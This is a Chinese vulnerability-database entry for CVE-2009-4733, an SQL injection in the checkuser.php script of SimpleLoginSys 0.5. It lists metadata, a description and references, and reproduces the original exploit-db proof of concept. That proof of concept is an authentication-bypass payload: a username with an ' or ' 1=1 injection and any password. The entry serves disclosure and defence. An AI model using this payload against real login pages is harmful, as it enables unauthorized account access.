Supercrackmunkey SimpleLoginSys checkuser.php脚本SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118242 漏洞类型 SQL注入
发布时间 2009-08-03 更新时间 2009-08-04
CVE编号 CVE-2009-4733 CNNVD-ID CNNVD-201003-242
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/9336
https://www.securityfocus.com/bid/42484
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-242
|漏洞详情
SimpleLoginSys中的checkuser.php脚本存在SQL注入漏洞。当magic_quotes_gpc被禁止时,远程攻击者可以借助username参数执行任意SQL指令。
|漏洞EXP
####################################################################################
[+] SimpleLoginSys v0.5 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
[+] download : http://sourceforge.net/projects/simplesiteadmin/files/simpleloginsys/SimpleLoginSys%20v0.5/simpleloginsys0.5.zip/download

####################################################################################

[+] SQL Injection (Auth Bypass)

 - Note : magic_quotes_gpc = off

 - PoC

    Username : [REAL_NICKNAME] ' or ' 1=1
    Password : anything

####################################################################################

# milw0rm.com [2009-08-03]
|受影响的产品
SuperCrackMunkey SimpleLoginSys 0.5
|参考资料

来源:VUPEN
名称:ADV-2009-2128
链接:http://www.vupen.com/english/advisories/2009/2128
来源:MILW0RM
名称:9336
链接:http://www.milw0rm.com/exploits/9336